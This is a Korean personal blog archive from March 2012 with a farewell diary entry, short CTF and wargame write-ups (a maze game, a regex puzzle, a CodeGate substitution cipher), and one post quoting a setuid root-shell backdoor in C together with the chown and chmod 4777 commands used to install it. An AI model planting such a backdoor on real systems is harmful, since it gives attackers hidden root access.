'2012/03'에 해당되는 글 8건

  1. 2012/03/26 작별.. (1)
  2. 2012/03/15 음?? 당했나? (3)
  3. 2012/03/15 setuid(0) 설정. (1)
  4. 2012/03/09 wargame - maze game (3)
  5. 2012/03/09 wargame - regex?!
  6. 2012/03/09 ructf (1)
  7. 2012/03/09 wargame.kr - bread shuttle
  8. 2012/03/05 MISC 100 (3)
2012/03/26 17:00
떠나고 떠나가고..
외롭다..

내 생일이 가까워오면서.. 갑작스레..
1주일간 많은 일들이 생겼다..

3월 22일 : 내 추천으로 회사에 입사한 후배녀석이 3개월만에 퇴사한다는 소식을 전했다..
3월 23일 : 내 멘토이자 든든했던 형이 잘되서 멀리 가게 될거라는 소식을 들었다...
3월 25일 : 2년여동안 내게 진실했던 사람이 이별을 고하였다....

3월이 아직 남아있는데..
점점 쌔지는 강도와.. 얼마나 더 많은 주위 사람들을 떠나보내야 할지...........
무섭고.. 두렵다..
.
.
.
.


저작자 표시 비영리 변경 금지

'My Life' 카테고리의 다른 글

작별..  (1) 2012/03/26
감사합니다.  (9) 2012/02/17
무제  (1) 2011/12/21
FM2012 예판 도착  (9) 2011/12/15
면접.  (2) 2011/12/07
IOS 5.0 으로 판올림 Upgrade.  (0) 2011/10/13
Posted by Sun2Day
2012/03/15 17:40
보안업체 같은데.. 당한건가? -_-ㅋ;;



저작자 표시 비영리 변경 금지

'기본적인 삽질 & 기록' 카테고리의 다른 글

롯데마트에선 안파는게 없군요.  (0) 2012/04/23
음?? 당했나?  (3) 2012/03/15
setuid(0) 설정.  (1) 2012/03/15
온라인 툴들. (생각나는 대로 추가할 예정)  (3) 2012/02/16
[펌]STEGANOGRAPHY SOFTWARE  (0) 2012/02/13
구글 봇탐지 기술..?  (0) 2012/02/12
Posted by Sun2Day
2012/03/15 16:04
어떤 X친놈이..
소스코드를 올렸다.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(void){
       setgid(0); setuid(0);
       execl("/bin/sh","sh",0);
}

컴파일을 한 이후..
소유권자를.. 없는 계정인.. 500:users 로 설정했다.. -_-;;

chown 500:users backdoor

그 다음 예상한대로 setuid 설정을 한다.

chmod 4777 backdoor

그대로 따라해봤다............
.
.
.
.
.


........
!%@!($&!@(*$!@)

안되자나............ 응?? 안되자나.................. 응???

도대체 넌 무슨 목적으로 없는 사용자인 500과 users라는 사용자 이름으로 권한을 준거니...?

니가 재정신이였으면.. root:root 로 설정했어야지.. 무슨 생각이니..???

대답 좀 해주렴.. 형이 궁금해서 그래...................

내가 모르는게 있는거니..?;;

아오.. 스트뤠쓰~~~



저작자 표시 비영리 변경 금지

'기본적인 삽질 & 기록' 카테고리의 다른 글

롯데마트에선 안파는게 없군요.  (0) 2012/04/23
음?? 당했나?  (3) 2012/03/15
setuid(0) 설정.  (1) 2012/03/15
온라인 툴들. (생각나는 대로 추가할 예정)  (3) 2012/02/16
[펌]STEGANOGRAPHY SOFTWARE  (0) 2012/02/13
구글 봇탐지 기술..?  (0) 2012/02/12
Posted by Sun2Day
2012/03/09 11:44


문제 페이지에 들어가면 위와 같은 게임이 생성되고 시작버튼부터 시작해서 마우스를 움직여 조작하게 된다.
Finish 에 도착하면 답이 나오는 그런 문제다.

소스코드를 보면 물론.. eval 로 인코딩 되어 있는 소스코드가 보인다.
하!지!만!

나는 위에처럼 일부러 게임을 끝낸 이후,
확인버튼 클릭 -> Finish 버튼 클릭 -> 컨트롤 + A - > 컨트롤 + C
라는 신공으로 답을 복사했다.

Clear
저작자 표시 비영리 변경 금지

'CTF 준비 > wargame.kr' 카테고리의 다른 글

wargame - maze game  (3) 2012/03/09
wargame - regex?!  (0) 2012/03/09
wargame.kr - bread shuttle  (0) 2012/03/09
Posted by Sun2Day
2012/03/09 11:41


문제 페이지 소스보기를 누르면 index.phps 라는 주석이 보인다.
들어가면 위와 같은 소스코드를 확인 할 수 있으며
결론적으로는

$pat="/^(([e]){1}J){2,}_l[^1-9,^a-z,^A-Z]".chr(118)."[?]{5,}".(19%4)."$/";

라는 정규표현식을 맞춰주면 정답이 나오게 된다.


저작자 표시 비영리 변경 금지

'CTF 준비 > wargame.kr' 카테고리의 다른 글

wargame - maze game  (3) 2012/03/09
wargame - regex?!  (0) 2012/03/09
wargame.kr - bread shuttle  (0) 2012/03/09
Posted by Sun2Day
2012/03/09 09:48


ructf ..

이름 답게.. 러시아에서 하는 ctf 다 ^^;
규칙 중 한가지가.. 50% 상이 학생이여야 한다.. 하는 조항이 끼어있어서.. 일단 나는 탈락!! ㅋ
하지만 ctf 준비하는 중이니까.. 역시 이것저것 풀어보면 좋을 듯 하여 일단 신청은 해놨다.
즐거운 주말이 되기를.~

ps. 근데.. 얘들이 너무 비협조적으로.. 영문도 아닌.. 러시아어로 써놔서.. 일단 극 to the 복 이 필요한 상황..

http://ructf.org/2012

저작자 표시 비영리 변경 금지

'CTF 준비' 카테고리의 다른 글

ructf  (1) 2012/03/09
Posted by Sun2Day
2012/03/09 09:41


문제 페이지를 보면 위와 같은 게임이 보인다.
W,A,D 를 누르면 게임이 진행되는데.. firefox에서는 되지 않는다.
몇번 눌러보니.. 도저히 깰 수 없는 게임이였다. -_-;;

웹페이지 소스를 보니 답이 너무나도 명확하게 나와있었다.

{m3.innerHTML="<br />"+move_right_left()+"c0"+chk2();}



저작자 표시 비영리 변경 금지

'CTF 준비 > wargame.kr' 카테고리의 다른 글

wargame - maze game  (3) 2012/03/09
wargame - regex?!  (0) 2012/03/09
wargame.kr - bread shuttle  (0) 2012/03/09
Posted by Sun2Day
2012/03/05 10:34
Fresh man IU who is real geek becomes a member of Club 101101.
IU is a timid person , so he really doesn 't like other people use his computer .
T h e n
Az hrb eix mcc gyam mcxgixec rokaxioaqh hrb mrqpck gyam lbamgarx oatygqh
Erxtoigbqigarx Gidc hrbg gasc gr koaxd erzzcc zro i jyaqc Kr hrb ocqh rx
Ockubqq ro Yrg man ? Gyc ixmjco am dccqihrbgm
If you can , please analyze this file 7 E85167E004F1045C2C96AD6C17FC8CF

문제와 함께 암호문과
Az hrb eix mcc gyam mcxgixec rokaxioaqh hrb mrqpck gyam lbamgarx oatygqh
Erxtoigbqigarx Gidc hrbg gasc gr koaxd erzzcc zro i jyaqc Kr hrb ocqh rx
Ockubqq ro Yrg man ? Gyc ixmjco am dccqihrbgm

파일이 하나 주어진다..
암호문만 풀면 될거 같은데.. 이런쪽엔 잼병인지라..
파일을 풀어봐도 몰랐었다..
그러다가 애플 키보드 레이아웃이라는 것만 알아냈을뿐.. 못풀고 있었는데..

헐래.. PPP 문제 풀이를 보는 순간. 헉헉.....

http://www.blisstonia.com/software/WebDecrypto/
이런 사이트에서.. 단 2초만에 풀리는걸 감상해버렸다.....
젠장젠장.. ㅠㅠ

해당 사이트에서는 설치형 툴로도 배포를 하고 있었다.. 젠장젠장..

이거.. 어케 하는거지 -_-;
암호학 공부가 좀 필요한거 같고..

에효. 나중에 구현이나 해봐야지................
oTL..

저작자 표시 비영리 변경 금지

'CTF 준비 > CodeGate2012' 카테고리의 다른 글

MISC 100  (3) 2012/03/05
Posted by Sun2Day